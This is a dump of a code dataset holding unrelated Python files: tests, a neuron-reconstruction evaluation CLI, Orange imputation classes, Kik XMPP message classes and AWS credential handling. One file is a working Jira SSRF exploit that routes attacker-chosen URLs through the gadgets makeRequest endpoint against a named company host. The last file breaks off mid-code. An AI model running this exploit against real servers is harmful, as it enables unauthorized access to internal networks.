id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
38027
|
def test_deploying_contract(client, hex_accounts):
pre_balance = client.get_balance(hex_accounts[1])
client.send_transaction(
_from=hex_accounts[0],
to=hex_accounts[1],
value=1234,
)
post_balance = client.get_balance(hex_accounts[1])
assert post_balance - pre_balance == 1234
|
38039
|
import argparse
import importlib
import os
import sys
import jsonschema
import pkg_resources
from multiprocessing import Pool, cpu_count
from pyneval.errors.exceptions import InvalidMetricError, PyNevalError
from pyneval.pyneval_io import json_io
from pyneval.pyneval_io import swc_io
from pyneval.metric.utils import anno_utils, config_utils
from pyneval.metric.utils import cli_utils
from pyneval.metric.utils.metric_manager import get_metric_manager
from pyneval.tools.optimize import optimize
# load method in metrics
def import_metrics():
base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
metric_path = os.path.join(base_dir, "pyneval/metric")
files = os.listdir(metric_path)
metrics = []
for f in files:
m_f = f.split(".")
if len(m_f) == 2 and m_f[0][-7:] == "_metric" and m_f[1] == "py":
metrics.append(m_f[0])
for m in metrics:
md = "pyneval.metric.{}".format(m)
importlib.import_module(md)
def read_parameters():
metric_manager = get_metric_manager()
parser = argparse.ArgumentParser(description="Current version: pyneval {}".format(
pkg_resources.require("pyneval")[0].version)
)
parser.add_argument(
"--gold",
"-G",
help="path of the gold standard SWC file",
required=False
)
parser.add_argument(
"--test",
"-T",
help="a list of reconstructed SWC files or folders for evaluation",
required=False,
nargs="*"
)
parser.add_argument(
"--metric",
"-M",
help="metric choice: " + metric_manager.get_metric_summary(False) + ".",
required=False
)
parser.add_argument(
"--output",
"-O",
help="output path of metric results, output file is in json format with different scores of the metric",
required=False,
)
parser.add_argument(
"--detail",
"-D",
help="output path of detail metric result, swc format presented.\n"
"identify different type according to metric result for each node",
required=False,
)
parser.add_argument(
"--config",
"-C",
help="path of custom configuration file for the specified metric",
required=False,
)
parser.add_argument(
"--parallel",
"-P",
help="Enable the parallel processing",
required=False,
action="store_true"
)
parser.add_argument(
"--optimize",
help="Enable optimizer mode",
required=False,
)
parser.add_argument(
"--path_validation",
help="Enable detailed path validation check",
required=False,
action="store_true"
)
parser.add_argument("--debug", help="print debug info or not", required=False, action="store_true")
return parser.parse_args()
def init(abs_dir):
sys.path.append(abs_dir)
sys.path.append(os.path.join(abs_dir, "src"))
sys.path.append(os.path.join(abs_dir, "test"))
sys.setrecursionlimit(1000000)
def set_configs(abs_dir, args):
# argument: debug
is_debug = False
if args.debug and args.debug.lower() in ("true", "t", "yes"):
is_debug = True
# argument: gold
gold_swc_path = os.path.join(abs_dir, args.gold)
gold_swc_tree = swc_io.read_swc_tree(gold_swc_path) # SwcTree
# argument: metric
metric_manager = get_metric_manager()
metric = metric_manager.get_root_metric(args.metric)
if not metric:
raise InvalidMetricError(args.metric, metric_manager.get_metric_summary(True))
# argument: test
test_swc_paths = [os.path.join(abs_dir, path) for path in args.test]
test_swc_trees = []
# read test trees
for file in test_swc_paths:
if file[-4:].lower() == ".tif":
continue
test_swc_trees.extend(swc_io.read_swc_trees(file))
if len(test_swc_paths) == 0:
raise PyNevalError("test models can't be null")
# info: how many trees read
print("Evaluating {} test model(s) \n".format(len(test_swc_trees)))
# argument: config
config_path = args.config
if config_path is None:
config = config_utils.get_default_configs(metric)
else:
config = json_io.read_json(config_path)
config_schema = config_utils.get_config_schema(metric)
jsonschema.validate(config, config_schema)
# argument: output
output_path = None
if args.output:
output_path = os.path.join(abs_dir, args.output)
# argument: detail
detail_dir = None
if args.detail:
detail_dir = os.path.join(abs_dir, args.detail)
# argument: parallel
is_parallel = False
if args.parallel:
is_parallel = args.parallel
is_path_validation = False
if args.path_validation:
is_path_validation = args.path_validation
# argument: optimize
optimize_config = None
if args.optimize:
optimize_config = json_io.read_json(args.optimize)
return gold_swc_tree, test_swc_trees, test_swc_paths, metric, output_path, detail_dir, config, is_debug, is_parallel, optimize_config, is_path_validation
def excute_metric(metric, gold_swc_tree, test_swc_tree, config, detail_dir, output_path, metric_method, is_path_validation):
test_swc_name = test_swc_tree.name()
result, res_gold_swc_tree, res_test_swc_tree = metric_method(
gold_swc_tree=gold_swc_tree, test_swc_tree=test_swc_tree, config=config
)
screen_output = config_utils.get_screen_output()
result_info = ""
for key in result:
if key in screen_output[metric]:
result_info += "{} = {}\n".format(key.ljust(15, " "), result[key])
print("---------------Result---------------\n" +
"swc_file_name = {}\n".format(test_swc_name) +
result_info +
"----------------End-----------------\n"
)
base_file_name = test_swc_name[:-4] + "_" + metric + "_"
def save_detail(swc_tree, file_name):
detail_path = os.path.normpath(os.path.join(detail_dir, file_name))
if is_path_validation:
detail_path = cli_utils.path_validation(detail_path, ".swc")
else:
detail_path = cli_utils.make_sure_path_not_exist(detail_path)
ok = False
if detail_path is not None:
ok = swc_io.swc_save(
swc_tree=swc_tree,
out_path=detail_path,
extra=anno_utils.get_detail_type(metric),
)
if detail_path is None or not ok:
print("[Warning:] Failed to save details: {}".format(file_name))
if detail_dir:
if res_gold_swc_tree is not None:
save_detail(res_gold_swc_tree, base_file_name+"recall.swc")
if res_test_swc_tree is not None:
save_detail(res_test_swc_tree, base_file_name+"precision.swc")
if output_path:
if is_path_validation:
output_path = cli_utils.path_validation(output_path, ".json")
else:
output_path = cli_utils.make_sure_path_not_exist(output_path)
ok = False
if output_path is not None:
ok = json_io.save_json(data=result, json_file_path=output_path)
if ok:
print("[Info:] Output saved")
if output_path is None or not ok:
print("[Warning:] Failed to save output")
# command program
def run():
abs_dir = os.path.abspath("")
import_metrics()
init(abs_dir)
args = read_parameters()
gold_swc_tree, test_swc_trees, test_swc_paths, metric, output_path, detail_dir, \
config, is_debug, is_parallel, optimize_config, is_path_validation = set_configs(abs_dir, args)
metric_manager = get_metric_manager()
metric_method = metric_manager.get_metric_method(metric)
if optimize_config is not None:
optimize.optimize(gold_swc_tree=gold_swc_tree, test_swc_paths=test_swc_paths,
optimize_config=optimize_config, metric_config=config, metric_method=metric_method)
elif is_parallel:
# use multi process
max_procs = cpu_count()
if len(test_swc_trees) < max_procs:
max_procs = len(test_swc_trees)
p_pool = Pool(max_procs)
for test_swc_tree in test_swc_trees:
p_pool.apply_async(
excute_metric,
args=(metric, gold_swc_tree, test_swc_tree, config, detail_dir, output_path, metric_method, is_path_validation),
)
p_pool.close()
p_pool.join()
else:
for test_swc_tree in test_swc_trees:
excute_metric(
metric=metric,
gold_swc_tree=gold_swc_tree,
test_swc_tree=test_swc_tree,
config=config,
detail_dir=detail_dir,
output_path=output_path,
metric_method=metric_method,
is_path_validation=is_path_validation,
)
print("Done!")
if __name__ == "__main__":
sys.exit(run())
|
38087
|
import numpy as np
import scipy.sparse as sp
import Orange.data
from Orange.statistics import distribution, basic_stats
from Orange.util import Reprable
from .transformation import Transformation, Lookup
__all__ = [
"ReplaceUnknowns",
"Average",
"DoNotImpute",
"DropInstances",
"Model",
"AsValue",
"Random",
"Default",
]
class ReplaceUnknowns(Transformation):
"""
A column transformation which replaces unknown values with a fixed `value`.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
value : int or float
The value with which to replace the unknown values
"""
def __init__(self, variable, value=0):
super().__init__(variable)
self.value = value
def transform(self, c):
if sp.issparse(c):
c.data = np.where(np.isnan(c.data), self.value, c.data)
return c
else:
return np.where(np.isnan(c), self.value, c)
class BaseImputeMethod(Reprable):
name = ""
short_name = ""
description = ""
format = "{var.name} -> {self.short_name}"
columns_only = False
def __call__(self, data, variable):
""" Imputes table along variable column.
Args:
data (Table): A table to impute.
variable (Variable): Variable for completing missing values.
Returns:
A new Variable instance with completed missing values or
a array mask of rows to drop out.
"""
raise NotImplementedError
def format_variable(self, var):
return self.format.format(var=var, self=self)
def __str__(self):
return self.name
def copy(self):
return self
@classmethod
def supports_variable(cls, variable):
return True
class DoNotImpute(BaseImputeMethod):
name = "Don't impute"
short_name = "leave"
description = ""
def __call__(self, data, variable):
return variable
class DropInstances(BaseImputeMethod):
name = "Remove instances with unknown values"
short_name = "drop"
description = ""
def __call__(self, data, variable):
col, _ = data.get_column_view(variable)
return np.isnan(col)
class Average(BaseImputeMethod):
name = "Average/Most frequent"
short_name = "average"
description = "Replace with average/mode of the column"
def __call__(self, data, variable, value=None):
variable = data.domain[variable]
if value is None:
if variable.is_continuous:
stats = basic_stats.BasicStats(data, variable)
value = stats.mean
elif variable.is_discrete:
dist = distribution.get_distribution(data, variable)
value = dist.modus()
else:
raise TypeError("Variable must be continuous or discrete")
a = variable.copy(compute_value=ReplaceUnknowns(variable, value))
a.to_sql = ImputeSql(variable, value)
return a
class ImputeSql(Reprable):
def __init__(self, var, default):
self.var = var
self.default = default
def __call__(self):
return "coalesce(%s, %s)" % (self.var.to_sql(), str(self.default))
class Default(BaseImputeMethod):
name = "Value"
short_name = "value"
description = ""
columns_only = True
format = "{var} -> {self.default}"
def __init__(self, default=0):
self.default = default
def __call__(self, data, variable, *, default=None):
variable = data.domain[variable]
default = default if default is not None else self.default
return variable.copy(compute_value=ReplaceUnknowns(variable, default))
def copy(self):
return Default(self.default)
class ReplaceUnknownsModel(Reprable):
"""
Replace unknown values with predicted values using a `Orange.base.Model`
Parameters
----------
variable : Orange.data.Variable
The target variable for the imputation.
model : Orange.base.Model
A fitted model predicting `variable`.
"""
def __init__(self, variable, model):
assert model.domain.class_var == variable
self.variable = variable
self.model = model
def __call__(self, data):
if isinstance(data, Orange.data.Instance):
column = np.array([float(data[self.variable])])
else:
column = np.array(data.get_column_view(self.variable)[0], copy=True)
mask = np.isnan(column)
if not np.any(mask):
return column
if isinstance(data, Orange.data.Instance):
predicted = self.model(data)
else:
predicted = self.model(data[mask])
column[mask] = predicted
return column
class Model(BaseImputeMethod):
_name = "Model-based imputer"
short_name = "model"
description = ""
format = BaseImputeMethod.format + " ({self.learner.name})"
@property
def name(self):
return "{} ({})".format(self._name, getattr(self.learner, "name", ""))
def __init__(self, learner):
self.learner = learner
def __call__(self, data, variable):
variable = data.domain[variable]
domain = domain_with_class_var(data.domain, variable)
if self.learner.check_learner_adequacy(domain):
data = data.transform(domain)
model = self.learner(data)
assert model.domain.class_var == variable
return variable.copy(compute_value=ReplaceUnknownsModel(variable, model))
else:
raise ValueError(
"`{}` doesn't support domain type".format(self.learner.name)
)
def copy(self):
return Model(self.learner)
def supports_variable(self, variable):
domain = Orange.data.Domain([], class_vars=variable)
return self.learner.check_learner_adequacy(domain)
def domain_with_class_var(domain, class_var):
"""
Return a domain with class_var as output domain.class_var.
If class_var is in the input domain's attributes it is removed from the
output's domain.attributes.
"""
if domain.class_var is class_var:
return domain
elif class_var in domain.attributes:
attrs = [var for var in domain.attributes if var is not class_var]
else:
attrs = domain.attributes
return Orange.data.Domain(attrs, class_var)
class IsDefined(Transformation):
def transform(self, c):
if sp.issparse(c):
c = c.toarray()
return ~np.isnan(c)
class AsValue(BaseImputeMethod):
name = "As a distinct value"
short_name = "new value"
description = ""
def __call__(self, data, variable):
variable = data.domain[variable]
if variable.is_discrete:
fmt = "{var.name}"
value = "N/A"
var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=variable.values + [value],
base_value=variable.base_value,
compute_value=Lookup(
variable,
np.arange(len(variable.values), dtype=int),
unknown=len(variable.values),
),
sparse=variable.sparse,
)
return var
elif variable.is_continuous:
fmt = "{var.name}_def"
indicator_var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=("undef", "def"),
compute_value=IsDefined(variable),
sparse=variable.sparse,
)
stats = basic_stats.BasicStats(data, variable)
return (
variable.copy(compute_value=ReplaceUnknowns(variable, stats.mean)),
indicator_var,
)
else:
raise TypeError(type(variable))
class ReplaceUnknownsRandom(Transformation):
"""
A column transformation replacing unknowns with values drawn randomly from
an empirical distribution.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
distribution : Orange.statistics.distribution.Distribution
The corresponding sampling distribution
"""
def __init__(self, variable, distribution):
assert distribution.size > 0
assert distribution.variable == variable
super().__init__(variable)
self.distribution = distribution
if variable.is_discrete:
counts = np.array(distribution)
elif variable.is_continuous:
counts = np.array(distribution)[1, :]
else:
raise TypeError("Only discrete and continuous " "variables are supported")
csum = np.sum(counts)
if csum > 0:
self.sample_prob = counts / csum
else:
self.sample_prob = np.ones_like(counts) / len(counts)
def transform(self, c):
if not sp.issparse(c):
c = np.array(c, copy=True)
else:
c = c.toarray().ravel()
nanindices = np.flatnonzero(np.isnan(c))
if self.variable.is_discrete:
sample = np.random.choice(
len(self.variable.values),
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
else:
sample = np.random.choice(
np.asarray(self.distribution)[0, :],
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
c[nanindices] = sample
return c
class Random(BaseImputeMethod):
name = "Random values"
short_name = "random"
description = "Replace with a random value"
def __call__(self, data, variable):
variable = data.domain[variable]
dist = distribution.get_distribution(data, variable)
# A distribution is invalid if a continuous variable's column does not
# contain any known values or if a discrete variable's .values == []
isinvalid = dist.size == 0
if isinvalid and variable.is_discrete:
assert len(variable.values) == 0
raise ValueError("'{}' has no values".format(variable))
elif isinvalid and variable.is_continuous:
raise ValueError("'{}' has an unknown distribution".format(variable))
if variable.is_discrete and np.sum(dist) == 0:
dist += 1 / len(dist)
elif variable.is_continuous and np.sum(dist[1, :]) == 0:
dist[1, :] += 1 / dist.shape[1]
return variable.copy(compute_value=ReplaceUnknownsRandom(variable, dist))
|
38151
|
from bs4 import BeautifulSoup
import requests
import csv
import sys
from urllib.error import HTTPError
sys.path.append("..")
import mytemp
import time
import json
url='https://gz.17zwd.com/api/shop/get-list/73'
resp=requests.get(url)
f=open('17wang.txt','w+',encoding='utf-8')
f.write(resp.text)
print(resp.text)
|
38157
|
import conftest # Add root path to sys.path
import os
import matplotlib.pyplot as plt
from PathPlanning.SpiralSpanningTreeCPP \
import spiral_spanning_tree_coverage_path_planner
spiral_spanning_tree_coverage_path_planner.do_animation = True
def spiral_stc_cpp(img, start):
num_free = 0
for i in range(img.shape[0]):
for j in range(img.shape[1]):
num_free += img[i][j]
STC_planner = spiral_spanning_tree_coverage_path_planner.\
SpiralSpanningTreeCoveragePlanner(img)
edge, route, path = STC_planner.plan(start)
covered_nodes = set()
for p, q in edge:
covered_nodes.add(p)
covered_nodes.add(q)
# assert complete coverage
assert len(covered_nodes) == num_free / 4
def test_spiral_stc_cpp_1():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test.png'))
start = (0, 0)
spiral_stc_cpp(img, start)
def test_spiral_stc_cpp_2():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test_2.png'))
start = (10, 0)
spiral_stc_cpp(img, start)
def test_spiral_stc_cpp_3():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test_3.png'))
start = (0, 0)
spiral_stc_cpp(img, start)
if __name__ == '__main__':
conftest.run_this_test(__file__)
|
38167
|
import requests
import sys
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:[email protected]/
def ssrf_poc(url, ssrf_url):
if url[-1] == '/':
url = url[:-1]
else:
url = url
vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Atlassian-Token": "<PASSWORD>",
"Connection": "close"
}
r = requests.get(url=vuln_url, headers=headers)
if r.status_code == 200 and 'set-cookie' in r.content:
print "\n>>>>Send poc Success!\n"
print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
print "\n>>>>vuln_url= " + vuln_url + '\n'
print r.content
else:
print "No Vuln Exit!"
if __name__ == "__main__":
while True:
print
ssrf_url = raw_input(">>>>SSRF URL: ")
url = "https://jira.liulishuo.work"
ssrf_poc(url, ssrf_url)
|
38213
|
from bs4 import BeautifulSoup
import time
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement, XMPPResponse
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
class OutgoingAcknowledgement(XMPPElement):
"""
Represents an outgoing acknowledgement for a message ID
"""
def __init__(self, sender_jid, is_receipt, ack_id, group_jid):
super().__init__()
self.sender_jid = sender_jid
self.group_jid = group_jid
self.is_receipt = is_receipt
self.ack_id = ack_id
def serialize(self):
timestamp = str(int(round(time.time() * 1000)))
user_ack_data = (
'<sender jid="{}">'
'<ack-id receipt="{}">{}</ack-id>'
'</sender>'
).format(self.sender_jid, str(self.is_receipt).lower(), self.ack_id)
group_ack_data = (
'<sender jid="{}" g="{}">'
'<ack-id receipt="{}">{}</ack-id>'
'</sender>'
).format(self.sender_jid, self.group_jid, str(self.is_receipt).lower(), self.ack_id)
data = ('<iq type="set" id="{}" cts="{}">'
'<query xmlns="kik:iq:QoS">'
'<msg-acks>'
'{}'
'</msg-acks>'
'<history attach="false" />'
'</query>'
'</iq>'
).format(self.message_id, timestamp, user_ack_data if self.group_jid != None else group_ack_data)
return data.encode()
class OutgoingHistoryRequest(XMPPElement):
"""
Represents an outgoing request for the account's messaging history
"""
def __init__(self):
super().__init__()
def serialize(self):
timestamp = str(int(round(time.time() * 1000)))
data = ('<iq type="set" id="{}" cts="{}">'
'<query xmlns="kik:iq:QoS">'
'<msg-acks />'
'<history attach="true" />'
'</query>'
'</iq>'
).format(self.message_id, timestamp,)
return data.encode()
class HistoryResponse(XMPPResponse):
"""
Represents a Kik messaging history response.
"""
def __init__(self, data: BeautifulSoup):
super().__init__(data)
self.id = data["id"]
if data.query.history:
self.more = data.query.history.has_attr("more")
self.from_jid = data["from"]
self.messages = []
for message in data.query.history:
if message["type"] == "receipt":
args = {
'type':'receipt',
'from_jid': message["from"],
'receipt_type':message.receipt["type"],
'id':message.receipt.msgid["id"]
}
self.messages.append(Struct(**args))
elif message["type"] == "chat":
args = {
'type':'chat',
'id':message["id"],
'from_jid':message["from"],
'body': message.body.text if message.body else None,
'preview': message.preview.text if message.preview else None,
'timestamp': message.kik["timestamp"]
}
self.messages.append(Struct(**args))
elif message["type"] == "groupchat":
args = {
'type': 'groupchat',
'id': message["id"],
'from_jid': message["from"],
'body': message.body.text if message.body else None,
'preview': message.preview.text if message.preview else None,
'timestamp': message.kik["timestamp"],
'group_jid': message.g["jid"]
}
self.messages.append(Struct(**args))
|
38277
|
from __future__ import absolute_import, division, print_function
import numpy as np
import tensorflow as tf
from IPython.core.debugger import Tracer; debug_here = Tracer();
batch_size = 5
max_it = tf.constant(6)
char_mat_1 = [[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0]]
char_mat_2 = [[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_3 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_4 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
char_mat_5 = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
#expected output: [5, 2, 4, 5, 4]
char_lst = [char_mat_1, char_mat_2, char_mat_3,
char_mat_4, char_mat_5]
np_char_tensor = np.array(char_lst)
char_prob = tf.constant(np.array(np_char_tensor), tf.float64)
char_prob = tf.transpose(char_prob, [1, 0, 2])
print(tf.Tensor.get_shape(char_prob))
sequence_length_lst = [1, 1, 1, 1, 1]
sequence_length = tf.constant(sequence_length_lst)
done_mask = tf.cast(tf.zeros(batch_size), tf.bool)
for time in range(0, 5):
print(time)
current_date = char_prob[:, time, :]
max_vals = tf.argmax(current_date, 1)
mask = tf.equal(max_vals, tf.constant(0, tf.int64))
current_mask = tf.logical_and(mask, tf.logical_not(done_mask))
done_mask = tf.logical_or(mask, done_mask)
time_vec = tf.ones(batch_size, tf.int32)*(time+2)
sequence_length = tf.select(done_mask, sequence_length, time_vec, name=None)
not_done_no = tf.reduce_sum(tf.cast(tf.logical_not(done_mask), tf.int32))
all_eos = tf.equal(not_done_no, tf.constant(0))
stop_loop = tf.logical_or(all_eos, tf.greater(time, max_it))
keep_working = tf.logical_not(stop_loop)
sess = tf.Session()
with sess.as_default():
tf.initialize_all_variables().run()
#print(char_prob.eval())
print(max_vals.eval())
print(mask.eval())
print(done_mask.eval())
print(sequence_length.eval())
print(keep_working.eval())
|
38286
|
import logging
import os
from figcli.config.style.color import Color
from figcli.io.input import Input
from figcli.svcs.config_manager import ConfigManager
from figcli.config.aws import *
from figcli.config.constants import *
log = logging.getLogger(__name__)
class AWSConfig:
"""
Utility methods for interacting with AWSCLI resources, such as the ~/.aws/credentials and ~/.aws/config files
"""
def __init__(self, color: Color = Color(False)):
self.init_files()
self.c = color
self._config = ConfigManager(AWS_CONFIG_FILE_PATH)
self._creds = ConfigManager(AWS_CREDENTIALS_FILE_PATH)
@staticmethod
def init_files():
os.makedirs(os.path.dirname(AWS_CREDENTIALS_FILE_PATH), exist_ok=True)
if not os.path.exists(AWS_CREDENTIALS_FILE_PATH):
with open(AWS_CREDENTIALS_FILE_PATH, "w+") as file:
file.write("")
if not os.path.exists(AWS_CONFIG_FILE_PATH):
with open(AWS_CONFIG_FILE_PATH, "w+") as file:
file.write("")
def _is_temporary_session(self, profile_name: str):
if self._creds.has_section(profile_name):
return self._creds.has_option(profile_name, AWS_CFG_TOKEN)
return False
def _backup_section(self, section: str):
backup_name, backup_profile = f'{section}-figgy-backup', f'profile {section}-figgy-backup'
profile_name = f'profile {section}'
if self._creds.has_section(section):
for opt in self._creds.options(section):
self._creds.set_config(backup_name, opt, self._creds.get_option(section, opt))
if self._config.has_section(profile_name):
for opt in self._config.options(profile_name):
self._config.set_config(backup_profile, opt, self._config.get_option(profile_name, opt))
def restore(self, profile_name: str) :
"""
Restore a credentials previously backed up by Figgy
"""
config_profile = f'profile {profile_name}'
backup_name, backup_profile = f'{profile_name}-figgy-backup', f'profile {profile_name}-figgy-backup'
creds_restored, config_restored = False, False
if self._creds.has_section(backup_name):
for opt in self._creds.options(backup_name):
self._creds.set_config(profile_name, opt, self._creds.get_option(backup_name, opt))
creds_restored = True
if self._config.has_section(backup_profile):
for opt in self._config.options(backup_profile):
self._config.set_config(config_profile, opt, self._config.get_option(backup_profile, opt))
config_restored = True
self._creds.delete(profile_name, AWS_CFG_TOKEN)
self._creds.save()
self._config.save()
if creds_restored and config_restored:
print(f"\n{self.c.fg_gr}Restoration successful!{self.c.rs}")
else:
print(f"\n{self.c.fg_yl}Unable to restore credentials. Profile: "
f"{self.c.fg_bl}[{backup_name}]{self.c.rs}{self.c.fg_yl} was not found in either the "
f"~/.aws/credentials or ~/.aws/config files.{self.c.rs}")
def write_credentials(self, access_key: str, secret_key: str, token: str, region: str,
profile_name: str = 'default') -> None:
"""
Overwrite credentials stored in the [default] profile in both ~/.aws/config and ~/.aws/credentials file
with the provided temporary credentials. This method also CREATES these files if they do not already exist.
"""
if not self._is_temporary_session(profile_name):
print(f"\n{self.c.fg_yl}Existing AWS Profile {self.c.fg_bl}[{profile_name}]{self.c.rs}{self.c.fg_yl} "
f"was found with long-lived access keys "
f"in file: {self.c.fg_bl}~/.aws/credentials{self.c.rs}{self.c.fg_yl}.\n"
f"To avoid overwriting these keys, they will be moved under profile: "
f"{self.c.rs}{self.c.fg_bl}[{profile_name}-figgy-backup]{self.c.rs}{self.c.fg_yl}.{self.c.rs}\n\n"
f"These old keys may be restored with: {self.c.fg_bl}`"
f"{CLI_NAME} iam restore`{self.c.rs}.")
self._backup_section(profile_name)
self._creds.set_config(profile_name, AWS_CFG_ACCESS_KEY_ID, access_key)
self._creds.set_config(profile_name, AWS_CFG_SECRET_KEY, secret_key)
self._creds.set_config(profile_name, AWS_CFG_TOKEN, token)
config_section = f'profile {profile_name}'
self._config.set_config(config_section, AWS_CFG_REGION, region)
self._config.set_config(config_section, AWS_CFG_OUTPUT, 'json')
print(f"\n\n{self.c.fg_gr}Successfully updated: {AWS_CREDENTIALS_FILE_PATH}{self.c.rs}")
print(f"{self.c.fg_gr}Successfully updated: {AWS_CONFIG_FILE_PATH}{self.c.rs}")
|
38291
|
from __future__ import absolute_import
from contextlib import contextmanager
from multiprocessing import TimeoutError
import signal
import datetime
import os
import subprocess
import time
import urllib
import zipfile
import shutil
import pytest
from .adb import ADB
from ..logger import Logger
def get_center(bounds):
"""
Returns given element center coords::
from magneto.utils import get_center
element = self.magneto(text='Foo')
(x, y) = get_center(element.info['bounds'])
:param dict bounds: Element position coordinates (top, right, bottom, left)
:return: x and y coordinates of element center
"""
x = bounds['right'] - ((bounds['right'] - bounds['left']) / 2)
y = bounds['bottom'] - ((bounds['bottom'] - bounds['top']) / 2)
return x, y
def get_config(attr, default=None):
"""
Allows access to config parameters::
from magneto.utils import get_config
package = get_config('--app-package')
:param str attr: Command line argument
:return: Requested config value
"""
# must have this check to avoid sphinx-autodoc exception
if getattr(pytest, 'config', None) != None:
return pytest.config.getoption(attr) or default
else:
return default
@contextmanager
def timewarp(timedelta_):
now = datetime.datetime.now()
future = now + timedelta_
ADB.set_datetime(future)
try:
yield
finally:
now = datetime.datetime.now()
ADB.set_datetime(now)
class Timeout():
"""
Allows polling a function till success or timeout::
import time
from magneto.utils import Timeout
result = False
with Timeout(seconds=5):
while not result:
result = some_function()
time.sleep(0.5)
:param integer seconds: Timeout value in seconds. Defaults to 1.
:param str error_message: Error message to display when timeout occurs. Defaults to 'Timeout'.
"""
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds or 1
self.error_message = error_message
def handle_timeout(self, signum, frame):
Logger.debug('Timeout reached {} seconds limit'.format(self.seconds))
raise TimeoutError(self.error_message)
def __enter__(self):
Logger.debug('Timeout started for {} seconds'.format(self.seconds))
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
Logger.debug('Timeout stopped.')
signal.alarm(0)
def unlock_device():
"""
Powers on device and unlocks it.
"""
# read device screen state
p = ADB.exec_cmd("shell 'if [ -z $(dumpsys power | grep mScreenOn=true) ]; then echo off; else echo on;fi'",
stdout=subprocess.PIPE)
device_screen = p.stdout.readline().strip('\r\n')
if device_screen == 'off':
# power on device
ADB.exec_cmd('shell input keyevent 26').wait()
# unlock device
ADB.exec_cmd('shell input keyevent 82').wait()
def wait_for_device():
"""
Wait for device to boot. 1 minute timeout.
"""
wait_for_device_cmd = 'wait-for-device shell getprop sys.boot_completed'
p = ADB.exec_cmd(wait_for_device_cmd, stdout=subprocess.PIPE)
boot_completed = p.stdout.readline().strip('\r\n')
try:
with Timeout(seconds=60):
while boot_completed != '1':
time.sleep(1)
p = ADB.exec_cmd(wait_for_device_cmd, stdout=subprocess.PIPE)
boot_completed = p.stdout.readline().strip('\r\n')
Logger.debug('Waiting for device to finish booting (adb shell getprop sys.boot_completed)')
except TimeoutError:
Logger.debug('Timed out while waiting for sys.boot_completed, there might not be a default launcher set, trying to run anyway')
pass
class Bootstrap(object):
_map = {
'no_app': 'https://github.com/EverythingMe/magneto-init/archive/master.zip',
'calc': 'https://github.com/EverythingMe/magneto-demo-calc/archive/master.zip'
}
def __init__(self, name):
if name not in self._map:
raise Exception('{} not recognized'.format(name))
filename, headers = urllib.urlretrieve(self._map[name])
with zipfile.ZipFile(filename) as zip_file:
rootdir = zip_file.namelist()[0]
for member in zip_file.namelist()[1:]:
if not os.path.basename(member):
# create dir from zipfile
os.mkdir(os.path.join(os.path.curdir, member.replace(rootdir, '')))
else:
# copy file (taken from zipfile's extract)
source = zip_file.open(member)
target = file(os.path.join(os.path.curdir, member.replace(rootdir, '')), "wb")
with source, target:
shutil.copyfileobj(source, target)
|
38311
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.humidifiers_and_dehumidifiers import HumidifierSteamGas
log = logging.getLogger(__name__)
class TestHumidifierSteamGas(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_humidifiersteamgas(self):
pyidf.validation_level = ValidationLevel.error
obj = HumidifierSteamGas()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_availability_schedule_name = "object-list|Availability Schedule Name"
